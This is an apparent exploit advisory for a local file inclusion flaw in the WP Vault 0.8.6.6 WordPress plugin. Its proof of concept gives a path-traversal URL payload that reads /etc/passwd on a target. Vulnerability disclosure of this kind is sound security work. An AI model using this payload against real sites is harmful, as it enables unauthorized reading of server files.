WordPress WP Vault 0.8.6.6 Local File Inclusion

2016.12.02
Credit: Lenon Leite
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: WP Vault 0.8.6.6 a Plugin WordPress a Local File Inclusion # Date: 28/11/2016 # Exploit Author: Lenon Leite # Vendor Homepage: https://wordpress.org/plugins/wp-vault/ # Software Link: https://wordpress.org/plugins/wp-vault/ # Contact: http://twitter.com/lenonleite # Website: http://lenonleite.com.br/ # Category: webapps # Version: 0.8.6.6 # Tested on: Ubuntu 14.04 1 - Description: $_GET[awpv-imagea] is not escaped in include file. http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/ 2 - Proof of Concept: http://Target/?wpv-image=[LFI] http://Target/?wpv-image=../../../../../../../../../../etc/passwd 3 - Timeline: 12/11/2016 - Discovered 12/11/2016 - vendor not found


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top